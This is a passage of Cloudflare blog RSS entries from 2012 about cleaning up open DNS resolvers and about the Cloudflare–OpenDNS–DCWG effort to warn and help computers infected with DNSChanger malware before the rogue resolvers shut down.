    <p>A few other organizations deserve a special shout out for helping with this effort. The great folks at <a href="http://teamcymru.com/">Team Cymru</a> have been tracking open resolvers and other badness online since before CloudFlare was even an idea. Their consistent efforts in this area have been awesome, and we're in the process of partnering with them to help get the word out.</p><p>In addition, SoftLayer has been especially vocal and active in spearheading clean up efforts on its network. As they <a href="http://blog.softlayer.com/2012/the-trouble-with-open-dns-resolvers/">pointed out in a great blog post</a>, because of the size and nature of their network, it's often difficult for them to police the configuration of software their customers run. Even so, they are actively reaching out to customers to educate them about the dangers of running open resolvers on their networks.</p><p>We greatly appreciate country CERTs/CSIRTs and various Information Sharing and Analysis Centers (ISACs) reaching out to us offering to get in touch with some of the less responsive network providers.</p><p>Going forward, we are happy to provide the IP addresses running open resolvers directly to any network provider that is interested in cleaning up their networks. If you're running a network on the list above, please don't hesitate to reach out to us, and we'll get you the data you need to help with cleanup.</p> ]]></content:encoded>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[DDoS]]></category>
            <guid isPermaLink="false">4YIvDtgRg2gC2AQBbvAvPH</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[DNSChanger Update: Nearly 4% of Infections Already Detected]]></title>
            <link>https://blog.cloudflare.com/dnschanger-update-nearly-4-of-infections-alre/</link>
            <pubDate>Sun, 20 May 2012 22:33:00 GMT</pubDate>
            <description><![CDATA[ Just a quick update on the initiative between CloudFlare, OpenDNS, and the DCWG to clean up the DNSChanger malware. In the last week, just over 11,000 websites enabled the Visitor DNSChanger Detector App through CloudFlare. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Just a quick update on the initiative between CloudFlare, OpenDNS, and the DCWG to <a href="/cloudflare-opendns-work-together-to-save-the">clean up the DNSChanger malware</a>. In the last week, just over 11,000 websites enabled the <a href="https://www.cloudflare.com/apps/dnschanger_detector">Visitor DNSChanger Detector App</a> through CloudFlare. Since then, those sites have collectively served more than 56 million page views. Just over 12,000 visitors to those websites have seen the warning about the DNSChanger virus and clicked on the link to learn more and clean up their infection. In just the first week, that's nearly <b>4% of the total number of estimated infected computers</b>that the CloudFlare community has already helped notify and get cleaned up.</p><p>While hundreds of thousands of computers are still infected and risk losing access to the Internet on July 9, 2012, we're proud of the strong start to this effort by the CloudFlare community along with OpenDNS and the DCWG.</p><p>If you haven't yet enabled the Visitor DNSChanger Detector App for your sites on CloudFlare, you can do so by following <a href="https://www.cloudflare.com/enable-app?app=dnschanger_detector">this link</a>.</p><p>Thanks for helping us #savetheweb.</p> ]]></content:encoded>
            <category><![CDATA[Save The Web]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">7B4cCwu01V0Hx97hvbDHjS</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[CloudFlare & OpenDNS Work Together to Help the Web]]></title>
            <link>https://blog.cloudflare.com/cloudflare-opendns-work-together-to-save-the/</link>
            <pubDate>Thu, 03 May 2012 13:00:00 GMT</pubDate>
            <description><![CDATA[ Several years ago, some suspected cyber criminals on the Internet wrote a family of malware dubbed DNSChanger. About a year ago, law enforcement tracked down the suspected cyber criminals behind this malware. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Several years ago, some suspected cyber criminals on the Internet wrote a family of malware dubbed DNSChanger. About a year ago, law enforcement tracked down the suspected cyber criminals behind this malware, arrested them, and took over the servers they were using to redirect customers to rogue sites.</p><p>As a result of a court order, the Internet Systems Consortium (ISC) under the direction of the FBI, has continued to run the DNS servers used by the malware for the last year. However, the court order will soon expire and those servers are scheduled to be shut down on July 9, 2012. When that happens, hundreds of thousands of Internet users whose systems are still infected and/or affected could lose access to the web, email, and anything else that depends on DNS. This is the story of how two Internet infrastructure startups — CloudFlare and <a href="http://www.opendns.com">OpenDNS</a> — are playing a small part to help solve the problem.</p>
    <div>
      <h3>A Bit of DNS Background</h3>
      <a href="#a-bit-of-dns-background">
        
      </a>
    </div>
    <p>Up front, in order to understand this story, you need to understand there are two types of DNS servers: recursive and authoritative. Everyone who uses the Internet needs a recursive DNS server. Your ISP usually provides these types of services or you can use a provider like OpenDNS, <a href="https://www.cloudflare.com/cloudflare-vs-google-dns/">Google</a>, DNSAdvantage, other public resolvers, or even run a server yourself to handle your recursive DNS queries.</p><p>On the other hand, every domain needs at least one authoritative DNS server. Authoritative servers are where a particular domain's records are hosted and published. Many <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name-registrar/">domain registrars</a> provide authoritative DNS servers, or you can use a service like CloudFlare and we provide authoritative DNS. When an Internet user types a Universal Resource Identifier (URI) aka Universal Resource Locator (URL) into their browser, clicks on a link, or sends an email, their computer queries their recursive DNS provider. If the recursive DNS provider has the answer cached then it responds. If it doesn't have the answer cached, or if the answer it has is stale, then the recursive DNS server queries the authoritative DNS server.</p><p>As mentioned above, OpenDNS provides recursive DNS. Their customers are web surfers and they provide a terrific service that helps speed up Internet browsing and protect people on the web from malware. CloudFlare provides authoritative DNS. Our customers are websites and we make those sites faster and protect sites from attacks directed at them. While we're often asked if OpenDNS and CloudFlare are competitive, in reality both services are complementary just using different parts of DNS (recursive and authoritative) to achieve a similar mission: a faster, safer, better Internet.</p>
    <div>
      <h3>How Suspected Cyber Criminals Use DNS to Do Bad Things</h3>
      <a href="#how-suspected-cyber-criminals-use-dns-to-do-bad-things">
        
      </a>
    </div>
    <p>The DNSChanger malware family was designed to change the recursive DNS server that Internet users' computers queries. Instead of directing DNS queries at the recursive server you or your ISP configured, the malware modified computer settings to route queries to recursive DNS servers controlled by the suspected cyber criminals.</p><p>The job of DNS is to translate a <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name/">domain name</a> such as dcwg.org, which humans prefer, into an IP address, like 108.162.205.64, which servers and routers can use. If you are a cyber criminal and you can gain control over someone's recursive DNS then you can direct traffic to certain sites to a fake version of the site. Once DNSChanger had web surfers querying rogue recursive DNS servers, all requests for legitimate websites could be directed to a fake website. For example, even if you typed your bank's domain name into your browser, if the suspected cyber criminals control recursive DNS then they can send you to a malicious site and steal your information.</p><p>Over the years DNSChanger operated unchecked, more than a million computers and home routers had their DNS configurations modified. Thankfully, law enforcement was able to track down the suspected cyber criminals behind the malware, arrest them, and seize control of the rogue recursive DNS servers. Unfortunately, hundreds of thousands of computers are still using the formerly rogue recursive DNS servers. On July 9, 2012 the court order directing ISC to operate the servers expires and those servers are scheduled to be shut down. On that date, all systems which still have their DNS settings modified by DNSChanger will effectively be cut off from the Internet.</p>
    <div>
      <h3>Getting the Word Out</h3>
      <a href="#getting-the-word-out">
        
      </a>
    </div>
    <p>The DNSChanger Working Group (DCWG), a loosely affiliated organization comprised of some of the world's largest and most competent ISPs, search engines vendors, software vendors, security companies, and others, has been working to get the word out about the problem and reduce the impact of the shutdown of the DNSChanger recursive servers. The DCWG launched a website (dcwg.org) to provide information about the malware, let people test whether they are infected, and provide recommendations on how to fix their systems. CloudFlare first became involved when the folks at dcwg.org reached out to us because their site was under heavy load after attention from major media outlets. CloudFlare helped keep the dcwg.org website online under the load caused by media attention over the last 10 days. We offloaded more than 95% of the traffic to the site, ensuring the site ran fast and stable even when it was being featured on the front page of cnn.com.</p><p>Unfortunately, one of the challenges in trying to address situations like DNSChanger is that you only know to go to the dcwg.org website if you already know about it. What you needed was something akin to an emergency broadcast system that would inform people who were infected that they had a problem as they surfed the web. In the process of working with the DCWG, we realized we might be able to help.</p><p>Some of our engineers created an app named Visitor DNSChanger Detector App. Any website on CloudFlare can enable the app with a single click from our apps marketplace. The app installs a small bit of Javascript on the page that tests visitors to see if they're infected. If the tests do not detect anything, nothing happens. If the tests indicate that the DNSChanger recursive servers are being used, then a banner is displayed across the top of the page and visitors are directed to instructions on how to clean up the infection (more on that in a second).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4rcW1y2z1SfbuAUHKVmr6e/11fcf74f101535ea62d47715125f04b6/banner_example.png.scaled500.png" />
            
            </figure><p>More than 470 million people pass through CloudFlare's network on a monthly basis. Our data suggest that more than half of the people infected with DNSChanger would visit at least one site on CloudFlare per month. Thepower of the Visitor DNSChanger Detector App is that as CloudFlare publishers enable it then there is an increasing likelihood that people who are infected will get information about their infection before they are no longer able to use the Internet on July 9, 2012.</p><p>While we've made it extremely easy for publishers on CloudFlare's network to help get the word out, we didn't want to restrict participation to only those sites using our service. We therefore decided to release the code for the checks publicly and as open source so anyone who can install a few lines of Javascript on their web pages will be able to install it on their own sites to inform their potentially infected users. You can access the code from the following <a href="https://github.com/cloudflare/dnschanger_detector">GitHub Repo</a>. We're hopeful that sites both large and small will take the time to install the code in order to help inform their visitors who may be infected.</p>
    <div>
      <h3>What Should People Notified of This Infection Do?</h3>
      <a href="#what-should-people-notified-of-this-infection-do">
        
      </a>
    </div>
    <p>While CloudFlare is able to assist with informing web surfers they have an infection, we aren't particularly well situated to actually fix the problem. After all, it isn't our customers that are directly impacted,but rather the customers of our customers. Many of the folks infected can get help from their ISPs, but for some this might not be an option. CloudFlare reached out to David Ulevitch, the CEO of OpenDNS and he saw this as a great opportunity to further OpenDNS's mission of helping build a better Internet. We added <a href="http://www.opendns.com/dns-changer">OpenDNS as aresource</a> for publishers to display to their customers when the Javascript detects the use of the DNSChanger recursive servers.</p>
    <div>
      <h3>The Power of the DNS</h3>
      <a href="#the-power-of-the-dns">
        
      </a>
    </div>
    <p>This incident illustrates to me the importance and power of the DNS system that underpins the Internet. The suspected cyber criminals were able to modify DNS settings to steal advertising revenue and perform other illegal activities. CloudFlare uses authoritative DNS in order to provision powerful tools to make sites faster and even help create a sort of emergency warning system for the Internet. OpenDNS provides high performance recursive DNS caching services for their customers. Combined, we hope to help the DCWG get the word out so the hundreds of thousands of Internet users still impacted by the DNSChanger malware will be able to take steps to ensure they'll be able to use the Internet on July 10, 2012 and beyond.</p> ]]></content:encoded>
            <category><![CDATA[Save The Web]]></category>
            <category><![CDATA[Malware]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">2N8sl2EjBxblXGvV9OtA45</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
    </channel>
</rss>